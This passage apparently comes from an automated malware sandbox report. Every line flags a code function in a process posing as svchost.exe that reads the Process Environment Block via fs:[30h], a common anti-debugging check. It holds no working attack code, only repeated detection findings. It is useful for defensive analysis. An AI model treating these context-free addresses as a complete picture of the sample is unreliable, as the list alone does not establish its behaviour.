            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]2_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]2_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]2_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]2_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]2_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]2_2_038C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]2_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]2_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]2_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]2_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]2_2_038B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]2_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]2_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]2_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]2_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]2_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]2_2_038C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]2_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]2_2_038B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]2_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]2_2_038D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]2_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]2_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]2_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]2_2_038BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]2_2_0386C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]2_2_03830710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]2_2_03860710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]2_2_038AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]2_2_03830750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]2_2_038BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]2_2_038B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]2_2_03838770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]2_2_0386C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]2_2_038666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]2_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]2_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]2_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]2_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]2_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]2_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]2_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]2_2_0384C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]2_2_03862674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]2_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]2_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]2_2_03864588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]2_2_0386E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]2_2_038365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]2_2_038325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]2_2_038C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]2_2_038364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]2_2_038644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]2_2_038BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]2_2_038304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]2_2_0382C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]2_2_0386A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]2_2_0382645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]2_2_0385245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]2_2_038BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]2_2_038DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]2_2_0385EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]2_2_038BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
